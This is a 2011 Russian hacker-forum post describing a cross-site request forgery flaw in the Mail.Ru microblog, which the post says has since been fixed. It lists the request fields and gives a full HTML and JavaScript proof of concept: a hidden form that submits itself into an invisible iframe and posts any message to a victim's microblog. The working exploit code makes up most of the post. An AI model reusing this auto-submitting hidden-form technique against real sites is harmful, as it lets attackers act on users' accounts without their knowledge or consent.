Stas'M Corp.
Главная | XSRF уязвимость в микроблоге (не актуально) - Форум | Регистрация | Вход
 
Среда, 04.10.2023, 20:10
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 3.235.188.113
Браузер: Неизвестен
Основные разделы
Мини-чат
Загружаем...
Пожалуйста подождите.
Наш опрос
На данный момент в разработке несколько проектов. Какие бы вы хотели увидеть в первую очередь?
Всего ответов: 576
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Administrator, Phantom, b@bskEnízm  
Форум » Хакерский форум » Mail.Ru » XSRF уязвимость в микроблоге (не актуально)
XSRF уязвимость в микроблоге (не актуально)
AdministratorДата: Понедельник, 30.05.2011, 17:26 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 90
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему отправить в микроблог пользователя любое сообщение.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса (старый вариант):

URL:http://my.mail.ru/cgi-bin/my/ajax
Метод:POST
Кодировка:UTF-8
Поля формы:
ajax_call1
func_namemicropost.send
data["Текст сообщения", ""]
mna0
mnb-1
_<пустое>

Образец запроса (новый вариант):

URL:http://my.mail.ru/cgi-bin/my/ajax
Метод:POST
Кодировка:UTF-8
Поля формы:
ajax_call1
func_namemicropost.send
data["Текст сообщения", {"type": "micropost"}]
mna0
mnb-1
_<пустое>

Образец HTML кода, использующего эту уязвимость:

Code
<form id="send_micropost" method="POST" action="http://my.mail.ru/cgi-bin/my/ajax" target="frame_micropost">
<input type="hidden" name="ajax_call" value="1">
<input type="hidden" name="func_name" value="micropost.send">
<input type="hidden" name="data" id="message_sending">
<input type="hidden" name="mna" value="0">
<input type="hidden" name="mnb" value="-1">
<input type="hidden" name="_" value="">
<input type="submit" value="Submit">
</form>
<script type="text/javascript">
document.getElementById('message_sending').value = "[\"Текст сообщения\", \"\"]";
document.getElementById('send_micropost').submit();
</script>
<iframe name="frame_micropost" width="0" height="0" scrolling="no" frameborder="0"></iframe>

К сожалению, эту уязвимость недавно исправили.
 
Форум » Хакерский форум » Mail.Ru » XSRF уязвимость в микроблоге (не актуально)
  • Страница 1 из 1
  • 1
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferB345247247920
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2023Хостинг от uCoz